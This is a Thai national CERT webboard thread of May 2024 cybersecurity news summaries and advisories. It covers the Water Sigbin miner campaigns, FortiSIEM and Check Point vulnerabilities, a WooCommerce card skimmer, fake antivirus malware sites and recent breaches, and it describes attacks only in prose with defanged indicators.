โพสต์ถูกสร้างโดย NCSA

Water Sigbin (aka the 8220 Gang) is a China-based threat actor that has been active since at least 2017. It focuses on deploying cryptocurrency-mining malware, primarily in cloud-based environments and Linux servers. The group has been known to integrate vulnerability exploitation as part of its wide array of TTPs. In our previous discussion on the the group's tactics, we looked into how it operates using ever-evolving and complex methods. However, cyberthreats rarely remain stagnant, with threat actors constantly finding new ways to outsmart defenders. Recently, we’ve observed the Water Sigbin using new techniques and methods to hide its activities, making the group’s attacks more difficult to defend systems against. We found the threat actor exploiting vulnerabilities with Oracle WebLogic server CVE-2017-3506 (a vulnerability allowing remote OS command execution) and CVE-2023-21839 (an insecure deserialization vulnerability) to deploy a cryptocurrency miner via a PowerShell script named bin.ps1 on the victim host. Upon closer examination of the group’s tools, tactics and procedures (TTPs), we determined the exploitation to be the work of Water Sigbin, indicating that it is continuously updating its deployment scripts and tools. We found exploitation attempts in both Linux and Windows machines, with the threat actor deploying shell scripts in the former and a PowerShell script in the latter. For our analysis, we will refer to the techniques used in the Windows version of the exploitation, which shows a noteworthy obfuscation technique used by Water Sigbin.

ที่มาแหล่งข่าว
https://www.trendmicro.com/en_us/research/24/e/decoding-8220-latest-obfuscation-tricks.html

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

FortiSIEM helps customers build an inventory of their organization’s assets, it aggregates logs and correlates information for threat detection and hunting, and allows automated response and remediation. CVE-2024-23108 and CVE-2024-23109 are OS command injection vulnerabilities in the FortiSIEM supervisor and can be exploited remotely, without authentication, with specially crafted API requests. Both flagged by Zach Hanley of Horizon3.ai, they are variants/patch bypasses of CVE-2023-34992, which Fortinet fixed in October 2023. The two variants were fixed in January 2024, and admins were advised to upgrade. (Fortinet created some confusion regarding CVE-2024-23108 and CVE-2024-23109 because it initially stated that the two CVEs were assigned erroneously, then later said that they were variants of CVE-2023-34992. An email Hanley received from Fortinet PSIRT confirmed the assigned CVEs.) PoCs for CVE-2024-23108 and CVE-2023-34992 have been published by Hanley on GitHub. Hanley has noted that “there is very little difference in the exploitation of the previous command injection, CVE-2023-34992, to this one, CVE-2024-23108, reported 6 months later”, and said that attempts to exploit them will leave evidence in the logs for the phMonitor service. For example, attempts to exploit CVE-2024-23108 will leave a log message containing a failed command with datastore[.]py nfs test. Admins should check their FortiSIEM installations and (if they haven’t already) upgrade to a version containing the fix. Vulnerabilities in Fortinet solutions are often leveraged by attackers in the wild, but there is no mention yet of these ones being exploited.

ที่มาแหล่งข่าว
https://www.helpnetsecurity.com/2024/05/29/cve-2024-23108-cve-2023-34992-poc/

Check Point has released hotfixes for a VPN zero-day vulnerability exploited in attacks to gain remote access to firewalls and attempt to breach corporate networks. On Monday, the company first warned about a spike in attacks targeting VPN devices, sharing recommendations on how admins can protect their devices. Later, it discovered the source of the problem, a zero-day flaw that hackers exploited against its customers. Tracked as CVE-2024-24919, the high-severity information disclosure vulnerability enables attackers to read certain information on internet-exposed Check Point Security Gateways with remote Access VPN or Mobile Access Software Blades enabled. "The vulnerability potentially allows an attacker to read certain information on Internet-connected Gateways with remote access VPN or mobile access enabled," reads an update on Check Point's previous advisory. "The attempts we've seen so far, as previously alerted on May 27, focus on remote access scenarios with old local accounts with unrecommended password-only authentication." CVE-2024-24929 impacts CloudGuard Network, Quantum Maestro, Quantum Scalable Chassis, Quantum Security Gateways, and Quantum Spark Appliances, in the product versions: R80.20.x, R80.20SP (EOL), R80.40 (EOL), R81, R81.10, R81.10.x, and R81.20.

ที่มาแหล่งข่าว
https://www.bleepingcomputer.com/news/security/check-point-releases-emergency-fix-for-vpn-zero-day-exploited-in-attacks/

Attackers are trying to gain access to Check Point VPN devices via local accounts protected only by passwords, the company has warned on Monday. Their ultimate goal is to use that access to discover and pivot to other enterprise assets and users, and gain persistence in enterprise environments. In mid-April 2024, Cisco Talos warned about a global increase in brute-force attacks against VPN services, web application authentication interfaces and SSH services. The devices targeted in these attacks were those by Cisco, Check Point, Fortinet and Sonicwall (VPNs), as well as by MiktroTik, Draytek, and Ubiquiti. The attempts were coming from IP addresses associated with proxy services, and were trying out combinations of most likely usernames and common passwords, such as “Passw0rd”, “qwerty”, “test123”, etc. Check Point now says that they have also recently witnessed compromised VPN solutions, including those by various cyber security vendors.

ที่มาแหล่งข่าว
https://www.helpnetsecurity.com/2024/05/28/attackers-target-check-point-vpn/

Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่ข้อมูลการเพิ่มช่องช่องโหว่ใหม่ 1 รายการใน Known Exploited Vulnerabilities Catalog โดยอิงตามหลักฐานของการแสวงหาผลประโยชน์ที่ยังดำเนินอยู่

• CVE-2024-5274 Google Chromium V8 Type Confusion Vulnerability

ช่องโหว่ประเภทนี้ส่วนใหญ่เป็นเวกเตอร์การโจมตี สำหรับผู้โจมตีทางไซเบอร์ที่เป็นอันตราย และก่อให้เกิดความเสี่ยงอย่างมากต่อองค์กรของรัฐบาลกลาง ซึ่งBinding Operational Directive (BOD) 22-01: การลดความเสี่ยงที่มีนัยสำคัญของช่องโหว่ที่ถูกใช้ประโยชน์ ได้สร้างแคตตาล็อกช่องโหว่ที่ทราบที่เจาะจงเป็นรายการที่มีอยู่ของช่องโหว่และความเสี่ยงทั่วไปที่รู้จัก (CVEs) ซึ่งมีความเสี่ยงที่สำคัญต่อองค์กรของรัฐบาลกลาง BOD 22-01 กำหนดให้หน่วยงาน FCEB แก้ไขช่องโหว่ที่ระบุภายในวันที่กำหนดเพื่อป้องกันเครือข่าย FCEB จากภัยคุกคามที่ทำงานอยู่
ทั้งนี้ CISA แนะนำให้ทุกองค์กรลดความเสี่ยงต่อการถูกโจมตีทางไซเบอร์ ให้ความสำคัญกับการแก้ไขช่องโหว่ของ Catalog อย่างทันท่วงที อ่านคำแนะนำฉบับเต็มได้ที่
https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog

อ้างอิง
https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Cybersecurity and Infrastructure Security Agency (CISA) ได้เผยแพร่คำแนะนำเกี่ยวกับระบบควบคุมอุตสาหกรรม(ICS) 1 รายการ เมื่อวันที่ 28 พฤษภาคม 2567 คำแนะนำเหล่านี้ให้ข้อมูลที่ทันท่วงทีเกี่ยวกับปัญหาด้านความปลอดภัยช่องโหว่ และช่องโหว่ที่อยู่รอบ ๆ ICS ในปัจจุบัน มีดังต่อไปนี้

• ICSA-24-149-01 Campbell Scientific CSI Web Server

ทั้งนี้ CISA สนับสนุนให้ผู้ใช้และผู้ดูแลระบบตรวจสอบคำแนะนำ ICS ที่เผยแพร่ใหม่สำหรับรายละเอียดทางเทคนิคและการบรรเทาผลกระทบ รายละเอียดเพิ่มเติมที่ https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-releases-one-industrial-control-systems-advisory

อ้างอิง
https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-releases-one-industrial-control-systems-advisory

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Unknown threat actors are abusing lesser-known code snippet plugins for WordPress to insert malicious PHP code in victim sites that are capable of harvesting credit card data. The campaign, observed by Sucuri on May 11, 2024, entails the abuse of a WordPress plugin called Dessky Snippets, which allows users to add custom PHP code. It has over 200 active installations. Such attacks are known to leverage known flaws in WordPress plugins or easily guessable credentials to gain administrator access and install other plugins (legitimate or otherwise) for post-exploitation. Sucuri said the Dessky Snippets plugin is used to insert a server-side PHP credit card skimming malware on compromised sites and steal financial data. "This malicious code was saved in the dnsp_settings option in the WordPress wp_options table and was designed to modify the checkout process in WooCommerce by manipulating the billing form and injecting its own code," security researcher Ben Martin said. Specifically, it's designed to add several new fields to the billing form that request credit card details, including names, addresses, credit card numbers, expiry dates, and Card Verification Value (CVV) numbers, which are then exfiltrated to the URL "hxxps://2of[.]cc/wp-content/." A noteworthy aspect of the campaign is that the billing form associated with the bogus overlay has its autocomplete attribute disabled (i.e., autocomplete="off"). "By manually disabling this feature on the fake checkout form it reduces the likelihood that the browser will warn the user that sensitive information is being entered, and ensures that the fields stay blank until manually filled out by the user, reducing suspicion and making the fields appear as regular, necessary inputs for the transaction," Martin said. This is not the first time threat actors have resorted to using legitimate code snippet plugins for malicious purposes. Last month, the company revealed the abuse of WPCode code snippet plugin to inject malicious JavaScript code into WordPress sites in order to redirect site visitors to VexTrio domains.

ที่มาแหล่งข่าว
https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html

In April 2024, Trellix Advanced Research Center team members discovered several fake antivirus sites hosting sophisticated malicious files like APK, EXE, and Inno setup installers. These sites are used to distribute SpyNote trojan, Lumma malware, and StealC malware. The malware hosts include avast-securedownload[.]com, bitdefender-app[.]com, and malwarebytes[.]pro. It hosts a sophisticated APK called Avast.apk that delivers SpyNote Trojan, which can install and delete packages, read call logs, SMS, contacts, storage data, phone state, and more. It also has a recorder, touch activity tracker, and update capabilities. Bitdefender-app[.]com delivers a zip file with an EXE named “setup-win-x86-x64[.]exe[.]zip” with a discreet TLS callback function. It delivers Lumma malware, targeting sensitive information like PC name, username, HWID, screen resolution, CPU, installed memory, running process, login data, history, cookies, tokens, and user profile information. Malwarebytes[.]pro delivers RAR files containing legitimate DLLs, Inno Setup, and StealC infostealing malware. The contents are compressed in gzip and transferred to the attacker’s C2 server. The stolen information includes account tokens, Steam tokens, saved card details, system profiles, Telegram logins, running process names, installed browser lists, and common system information.

ที่มาแหล่งข่าว
https://www.hackread.com/fake-antivirus-sites-malware-avast-malwarebytes-bitdefender/

Industrial Sector

• Campbell Scientific CSI Web Server
  "Successful exploitation of these vulnerabilities could allow an attacker to download files and decode stored passwords."
  https://www.cisa.gov/news-events/ics-advisories/icsa-24-149-01

Vulnerabilities

• Exploit Released For Maximum Severity Fortinet RCE Bug, Patch Now
  "​Security researchers have released a proof-of-concept (PoC) exploit for a maximum-severity vulnerability in Fortinet's security information and event management (SIEM) solution, which was patched in February. Tracked as CVE-2024-23108, this security flaw is a command injection vulnerability discovered and reported by Horizon3 vulnerability expert Zach Hanley that enables remote command execution as root without requiring authentication."
  https://www.bleepingcomputer.com/news/security/exploit-released-for-maximum-severity-fortinet-rce-bug-patch-now/
  https://securityaffairs.com/163797/hacking/fortinet-siem-critical-rce-poc.html

• CISA Adds One Known Exploited Vulnerability To Catalog
  "CISA has added one new vulnerability to its Known Exploited Vulnerabilities Catalog, based on evidence of active exploitation."
  https://www.cisa.gov/news-events/alerts/2024/05/28/cisa-adds-one-known-exploited-vulnerability-catalog

• Unauthenticated XSS Vulnerability Patched In Slider Revolution Plugin
  "Slider Revolution came to us with a request to audit their product for potential vulnerabilities since they wanted to make sure that their users’ websites were not vulnerable to an attack. This blog post discusses our audit findings, which we have been authorized to publicize. If you're a Slider Revolution user, please update the plugin to version 6.7.11 or higher."
  https://patchstack.com/articles/unauthenticated-xss-vulnerability-patched-in-slider-revolution-plugin/
  https://www.infosecurity-magazine.com/news/xss-flaws-wordpress-plugin-slider/

Malware

• Server Side Credit Card Skimmer Lodged In Obscure Plugin
  "Attackers are always finding new ways to inject malware into websites and new ways to obscure it to avoid detection, but they’re always up to their same old tricks. In this post, we’ll explore how attackers are using a very obscure PHP snippet WordPress plugin to install server-side malware to harvest credit card details from a WooCommerce online store."
  https://blog.sucuri.net/2024/05/server-side-credit-card-skimmer-lodged-in-obscure-plugin.html
  https://thehackernews.com/2024/05/wordpress-plugin-exploited-to-steal.html
  https://securityaffairs.com/163777/malware/wordpress-plugin-insert-e-skimmer.html

• Technical Analysis Of Anatsa Campaigns: An Android Banking Malware Active In The Google Play Store
  "At Zscaler ThreatLabz, we regularly monitor the Google Play store for malicious applications. Over the past few months, we identified and analyzed more than 90 malicious applications uploaded to the Google Play store. These malware-infected applications have collectively garnered over 5.5 million installs."
  https://www.zscaler.com/blogs/security-research/technical-analysis-anatsa-campaigns-android-banking-malware-active-google
  https://www.bleepingcomputer.com/news/security/over-90-malicious-android-apps-with-55m-installs-found-on-google-play/
  https://www.darkreading.com/endpoint-security/90-malicious-apps-55-million-downloads-google-play
  https://www.infosecurity-magazine.com/news/teabot-banking-trojan-activity/

• Moonstone Sleet Emerges As New North Korean Threat Actor With New Bag Of Tricks
  "Microsoft has identified a new North Korean threat actor, now tracked as Moonstone Sleet (formerly Storm-1789), that uses both a combination of many tried-and-true techniques used by other North Korean threat actors and unique attack methodologies to target companies for its financial and cyberespionage objectives. Moonstone Sleet is observed to set up fake companies and job opportunities to engage with potential targets, employ trojanized versions of legitimate tools, create a malicious game, and deliver a new custom ransomware."
  https://www.microsoft.com/en-us/security/blog/2024/05/28/moonstone-sleet-emerges-as-new-north-korean-threat-actor-with-new-bag-of-tricks/
  https://www.bleepingcomputer.com/news/microsoft/microsoft-links-moonstone-sleet-north-korean-hackers-to-new-fakepenny-ransomware/
  https://www.bankinfosecurity.com/microsoft-warns-north-koreas-moonstone-sleet-a-25344

• Threats That Hide In Your Microsoft Office Documents
  "Microsoft Office documents in the Office365 software suite have become a mainstay for many users who need to create documents for business reports, college essays, resumes, essential notetaking, and even strategic analyses. Office documents offer a wide range of not only text but data editing software solutions that include technologies that introduce algorithmic logic via a macro or, more recently, with the integration of Python scripting being added to Excel for a more dynamic and logical way of interpreting, editing, and displaying data."
  https://cofense.com/blog/threats-that-hide-in-your-microsoft-office-documents/

• CatDDoS-Related Gangs Have Seen a Recent Surge In Activity
  "XLab's CTIA(Cyber Threat Insight Analysis) System continuously tracks and monitors the active mainstream DDoS botnets. Recently, our system has observed that CatDDoS-related gangs remain active and have exploited over 80 vulnerabilities over the last three months. Additionally, the maximum number of targets has been observed to exceed 300+ per day. So we decided to share some recent data with the community for reference."
  https://blog.xlab.qianxin.com/catddos-derivative-en/
  https://thehackernews.com/2024/05/researchers-warn-of-catddos-botnet-and.html
  https://www.darkreading.com/cyberattacks-data-breaches/catddos-threat-groups-sharply-ramp-up-ddos-attacks

• Breach Forums Return To Clearnet And Dark Web Despite FBI Seizure
  "Breach Forums returns to the clearnet and dark web just two weeks after the FBI seized its infrastructure and arrested two administrators. One of the admins, ShinyHunters, regained domains despite the FBI’s efforts, highlighting significant operational setbacks and security lapses."
  https://www.hackread.com/breach-forums-return-clearnet-dark-web-fbi-seizure/
  https://www.theregister.com/2024/05/28/breachforums_back_online/

• Trusted Relationship Attacks: Trust, But Verify
  "IT outsourcing market continues to demonstrate strong growth globally – such services are becoming increasingly popular. But along with the advantages, such as saved time and resources, delegating non-core tasks creates new challenges in terms of information security. By providing third-party companies (service providers or contractors) with access to their infrastructure, businesses increase the risk of trusted relationship attacks – T1199 in the MITRE ATT&CK classification."
  https://securelist.com/trusted-relationship-attack/112731/

• From Origins To Operations: Understanding Black Basta Ransomware
  "Since its emergence in 2022, Black Basta has targeted over 500 organizations worldwide, leveraging sophisticated tactics to become a leading ransomware threat. Here’s a look at their methods of operation, notable attacks, and the potential future of this formidable cybercriminal group."
  https://flashpoint.io/blog/understanding-black-basta-ransomware/

• SharpPanda APT Targets Malaysia With Backdoor Malware
  "In a recent analysis conducted in March and April 2024, the NetbyteSEC Detecx (NBS) team exposed a sophisticated malware campaign orchestrated by the notorious SharpPanda APT group, specifically aimed at targets in Malaysia. The malicious executable, disguised as a harmless Microsoft Word document titled “REKOD MINIT KSN KEPADA YAB PM 2023 – 15.exe,” was designed to establish a backdoor connection, granting attackers unauthorized access to compromised systems."
  https://securityonline.info/sharppanda-apt-targets-malaysia-with-backdoor-malware/
  https://notes.netbytesec.com/2024/05/inside-sharppandas-malware-targeting.html

Breaches/Hacks/Leaks

• First American December Data Breach Impacts 44,000 People
  "​First American Financial Corporation, the second-largest title insurance company in the United States, revealed Tuesday that a December cyberattack led to a breach impacting 44,000 individuals. Founded in 1889, it provides financial and settlement services to real estate professionals, home buyers, and sellers involved in residential and commercial property transactions. The California-based company has over 21,000 employees and reported a total revenue of $6 billion last year."
  https://www.bleepingcomputer.com/news/security/first-american-december-data-breach-impacts-44-000-people/

• Hackers Claim Ticketmaster Data Breach: 560M Users’ Info For Sale At $500K
  "ShinyHunters hacking group has claimed to have breached Ticketmaster, stealing the personal data of 560 million users. The 1.3 TB of stolen data also includes payment details. Learn more about this major cybersecurity incident and its implications."
  https://www.hackread.com/hackers-ticketmaster-data-breach-560m-users-sale/

• ABN Amro Client Data Possibly Stolen In AddComm Ransomware Attack
  "Dutch bank ABN Amro says client data may have been compromised in a ransomware attack at third-party services provider AddComm. The third-party provider announced that the incident has been contained and that the attackers no longer have access to its systems, which have since been restored, but could not confirm what type of data may have been stolen during the attack."
  https://www.securityweek.com/abn-amro-client-data-possibly-stolen-in-addcomm-ransomware-attack/

• Ransomware Attack On Seattle Public Library Knocks Out Online Systems
  "A ransomware attack on the Seattle Public Library has brought services to a halt — knocking out the wireless network, computers for staff and patrons, and the entire online catalog. The incident began on Saturday, the organization said in a statement on Monday afternoon. The library has 27 different branches serving nearly 800,000 residents."
  https://therecord.media/ransomware-attack-seattle-knocks-out

• Major Russian Delivery Company Down For Three Days Due To Cyberattack
  "A little-known hacker group claimed responsibility for an attack that has disrupted service for days at CDEK, one of Russia’s largest delivery companies. The Russian-speaking hackers, who call themselves Head Mare, said they encrypted the company’s servers with ransomware and destroyed backup copies of its corporate systems."
  https://therecord.media/russian-delivery-company-cdek-down-cyberattack

• Christie’s Confirms Breach After RansomHub Threatens To Leak Data
  "Christie's confirmed that it suffered a security incident earlier this month after the RansomHub extortion gang claimed responsibility and threatened to leak stolen data. Christie's is a prominent auction house with a history spanning 2.5 centuries. It operates in 46 countries and specializes in selling art, luxury items, and high-valued collectibles."
  https://www.bleepingcomputer.com/news/security/christies-confirms-breach-after-ransomhub-threatens-to-leak-data/
  https://therecord.media/christies-cyberattack-ransomhub-claims
  https://www.securityweek.com/christies-confirms-data-breach-after-ransomware-group-claims-attack/
  https://securityaffairs.com/163808/cyber-crime/christie-data-breach.html
  https://www.nytimes.com/2024/05/27/arts/design/hackers-claim-christies-attack.html
  https://www.theregister.com/2024/05/28/christies_confirms_cybercriminals_stole_client/

General News

• The Evolution Of Security Metrics For NIST CSF 2.0
  "CISOs have long been spreadsheet aficionados, soaking up metrics and using them as KPIs for security progress. These metrics have traditionally measured specific systems or single indicators — vulnerabilities detected, percentage of vulnerabilities patched, software and hardware asset inventory coverage, etc. The NIST Cybersecurity Framework (CSF) 2.0 underscored that metrics like these alone are insufficient and probably even improper when used as proxies for security outcomes."
  https://www.helpnetsecurity.com/2024/05/28/cisos-security-metrics-nist-csf-2-0/

• How To Combat Alert Fatigue In Cybersecurity
  "In this Help Net Security interview, Ken Gramley, CEO at Stamus Networks, discusses the primary causes of alert fatigue in cybersecurity and DevOps environments. Alert fatigue results from the overwhelming volume of event data generated by security tools, the prevalence of false positives, and the lack of clear event prioritization and actionable guidance."
  https://www.helpnetsecurity.com/2024/05/28/ken-gramley-stamus-networks-alert-fatigue/

• Widespread Data Silos Slow Down Security Response Times
  "Although the goals and challenges of IT and security professionals intersect, 72% report security data and IT data are siloed in their organization, which contributes to corporate misalignment and elevated security risk, according to Ivanti."
  https://www.helpnetsecurity.com/2024/05/28/data-silos-problem-for-organizations/

• 34% Of Organizations Lack Cloud Cybersecurity Skills
  "Incident response today is too time consuming and manual, leaving organizations vulnerable to damage due to their inability to efficiently investigate and respond to identified threats, according to Cado Security."

https://www.helpnetsecurity.com/2024/05/28/cloud-visibility-challenges/

• #Infosec2024: Why Human Risk Management Is Cybersecurity's Next Step For Awareness
  "Amid frequent warnings about the advanced capabilities of cyber threat actors, targeting human frailties remains the primary initial access method for attackers. This reality has led to the development of human risk management (HRM), a concept that places a focus on targeted, intelligence led interventions to improve security behaviors."
  https://www.infosecurity-magazine.com/news/human-risk-management/

• Take Two APIs And Call Me In The Morning: How Healthcare Research Can Cure Cyber Crime
  "Some ideas work better than others. Take DARPA, the US Defense Advanced Research Projects Agency. Launched by US President Dwight Eisenhower in 1957 response to Sputnik, its job is to create and test concepts that may be useful in thwarting enemies. Along the way, it's helped make happen GPS, weather satellites, PC technology, and something called the internet."
  https://www.theregister.com/2024/05/28/take_two_apis_and_call/

• US Govt Sanctions Cybercrime Gang Behind Massive 911 S5 Botnet
  "The U.S. Treasury Department has sanctioned a cybercrime network comprising three Chinese nationals and three Thailand-based companies linked to a massive botnet controlling a residential proxy service known as "911 S5." Researchers at the Canadian University of Sherbrooke revealed almost two years ago, in June 2022, that this illegitimate residential proxy service lured potential victims by offering free VPN services to install malware designed to add their IP addresses to the 911 S5 botnet."
  https://www.bleepingcomputer.com/news/security/us-govt-sanctions-cybercrime-gang-behind-massive-911-s5-proxy-botnet-linked-to-illegitimate-residential-proxy-service/
  https://home.treasury.gov/news/press-releases/jy2375
  https://therecord.media/us-sanctions-chinese-botnet-proxy
  https://www.bankinfosecurity.com/us-sanctions-chinese-national-for-running-911-s5-botnet-a-25340

• Russian Indicted For Selling Access To US Corporate Networks
  "A 31-year-old Russian national named Evgeniy Doroshenko has been indicted for wire and computer fraud in the United States for allegedly acting as an "initial access broker" from February 2019 to May 2024. An initial access broker (IAB) is a threat actor who breaches corporate networks and then sells that access to other threat actors, who commonly use the access to conduct data theft or ransomware attacks."
  https://www.bleepingcomputer.com/news/security/russian-indicted-for-selling-access-to-us-corporate-networks/

• From Phish To Phish Phishing: How Email Scams Got Smart
  "If only things were this easy. There’s never been a time where phishing was good, but there was certainly a time where phishing seemed quaint. Back in the 1990s, and even up until the last few years, phishing as a concept was marked more by comical errors than it was by pure evil. We’ve seen them all. The ALL CAPS subject lines. The grammar, or lack thereof. The horrible spoof jobs. You may have gotten these emails in the 1990s. You may have gotten these emails in the last few months."
  https://blog.checkpoint.com/security/from-phish-to-phish-phishing-how-email-scams-got-smart/

• The SEC's New Take On Cybersecurity Risk Management
  "The advent of generative AI is surfacing new risks, significantly raising the stakes for businesses around the globe and for marketplace stability. In reaction to the logarithmic growth of cybercrime, the guidance and regulatory landscape is changing rapidly. While historically, the United States preferred frameworks over regulation, in 2023 there was a significant regulatory development: the introduction of new cybersecurity rules by the Securities and Exchange Commission (SEC)."
  https://www.darkreading.com/cyberattacks-data-breaches/secs-new-take-on-cybersecurity-risk-management

• Social Distortion: The Threat Of Fear, Uncertainty And Deception In Creating Security Risk
  "In offensive security, there are a range of organization specific vulnerabilities that create risk, from software/hardware vulnerabilities, to processes and people. Attackers target and prey on any weakness they can identify. While Red Teams can expose and root out organization specific weaknesses, there is another growing class of vulnerability at an industry level. It’s not a single actor, vulnerability or intentionally malicious campaign. It manifests from governmental requirements and policy interference, to overblown, sometimes false alarms about technology safety, to active efforts to undermining research or authoritative industry voices."
  https://www.securityweek.com/social-distortion-the-threat-of-fear-uncertainty-and-deception-in-creating-security-risk/

• Indian National Pleads Guilty To Wire Fraud Conspiracy For Stealing Over $37 Million By Spoofing Coinbase's Website
  "Chirag Tomar, 30, a citizen of the Republic of India, appeared before U.S. Magistrate Judge Susan C. Rodriguez today and pleaded guilty to federal charges for stealing more than $37 million through a spoofing scheme of the Coinbase website, announced Dena J. King, U.S. Attorney for the Western District of North Carolina. Tomar was arrested at the Atlanta airport on Dec. 20, 2023, upon entering the United States, and remains in federal custody."
  https://www.justice.gov/usao-wdnc/pr/indian-national-pleads-guilty-wire-fraud-conspiracy-stealing-over-37-million-spoofing
  https://www.bleepingcomputer.com/news/security/indian-man-stole-37-million-in-crypto-using-fake-coinbase-pro-site/
  https://thehackernews.com/2024/05/indian-national-pleads-guilty-to-37.html

อ้างอิง
Electronic Transactions Development Agency(ETDA)

Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ TP-Link ได้เปิดตัวการอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ที่สำคัญ CVE-2024-5035 ที่ส่งผลต่อผลิตภัณฑ์เราเตอร์เกม Archer C5400X ช่องโหว่ดังกล่าวมีคะแนน CVSSv4 : 10

การใช้ประโยชน์จากช่องโหว่ที่ประสบความสำเร็จอาจทำให้ผู้โจมตีระยะไกลที่ไม่ได้รับการรับรองความถูกต้องสามารถรันคำสั่งโบนอุปกรณ์ที่ได้รับผลกระทบด้วยสิทธิ์ที่เพิ่มขึ้น

ช่องโหว่นี้ส่งผลต่อเวอร์ชัน 1_1.1.6 และก่อนหน้า

แนะนำให้ผู้ใช้งานและผู้ดูแลระบบควรอัปเดตผลิตภัณฑ์เป็นเวอร์ชันล่าสุดทันที

อ้างอิง
https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-062

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับ Cacti ที่ได้เปิดตัวการอัปเดตความปลอดภัยเพื่อแก้ไขช่องโหว่ร้ายแรงในผลิตภัณฑ์ของตน

รายการช่องโหว่มีดังนี้

• CVE-2024-29895: การใช้ประโยชน์จากช่องโหว่นี้สำเร็จอาจทำให้ผู้โจมตีที่ไม่ได้รับการรับรองความถูกต้องสามารถดำเนินการเรียกใช้โค้ดจากระยะไกลได้ ช่องโหว่นี้มีคะแนน CVSSv :10
• CVE-2024-25641: การใช้ประโยชน์จากช่องโหว่นี้สำเร็จอาจทำให้ผู้โจมตีที่ได้รับการรับรองความถูกต้องด้วยสิทธิ์ "นำเข้าเทมเพลต" สามารถเขียนไฟล์ที่กำหนดเองหรือรันโค้ด PHP ที่เป็นอันตรายบนเซิร์ฟเวอร์ที่ได้รับผลกระทบ ช่องโหว่นี้มีคะแนน CVSSv :9.1
• CVE-2024-34340: การใช้ประโยชน์จากช่องโหว่นี้สำเร็จอาจทำให้ผู้โจมตีสามารถเลี่ยงการรับรองความถูกต้องและเข้าถึงเซิร์ฟเวอร์ที่ได้รับผลกระทบได้ ช่องโหว่นี้มีคะแนน CVSSv :9.1

ช่องโหว่ร้ายแรงส่งผลกระทบต่อเวอร์ชันของ Cacti ก่อน 1.2.27

แนะนำให้ผู้ใช้งานและผู้ดูแลระบบเวอร์ชันผลิตภัณฑ์ที่ได้รับผลกระทบควรอัปเดตเป็นเวอร์ชันล่าสุดทันที

อ้างอิง
https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-063

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

@NCSA_THAICER มีอะไรบ้างคะ

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand

Cyber Security Agency of Singapore (CSA)ได้เผยแพร่เกี่ยวกับมีรายงานการใช้ประโยชน์จากช่องโหว่ที่ส่งผลกระทบต่อเราเตอร์ D-Link DIR-600 และ DIR-605

รายการช่องโหว่ดังนี้

• CVE-2014-100005: การใช้ประโยชน์จากช่องโหว่การปลอมแปลงคำขอข้ามไซต์ (CSRF) ที่ประสบความสำเร็จอาจทำให้ผู้โจมตีสามารถจี้เซสชันผู้ดูแลระบบที่มีอยู่และเปลี่ยนการกำหนดค่าเราเตอร์ได้
• CVE-2021-40655: การใช้ประโยชน์จากช่องโหว่การเปิดเผยข้อมูลได้สำเร็จอาจทำให้ผู้โจมตีสามารถรับข้อมูลรับรองการเข้าสู่ระบบโดยการปลอมคำขอ POST ไปยังหน้าการกำหนดค่าของเราเตอร์ที่ได้รับผลกระทบ

ช่องโหว่ส่งผลกระทบต่อผลิตภัณฑ์ต่อไปนี้:

• DIR-600
• DIR-605
• DIR-605L

ผลิตภัณฑ์ D-Link ที่ได้รับผลกระทบถึงจุดสิ้นสุดของชีวิต (EOL) แล้ว ผู้ใช้งานและผู้ดูแลระบบของผลิตภัณฑ์ EOL ที่ได้รับผลกระทบควรเลิกใช้และเปลี่ยนอุปกรณ์ด้วยผลิตภัณฑ์ที่สนับสนุนโดยผู้ผลิต

อ้างอิง
https://www.csa.gov.sg/alerts-advisories/alerts/2024/al-2024-058

สามารถติดตามข่าวสารได้ที่ webboard หรือ Facebook NCSA Thailand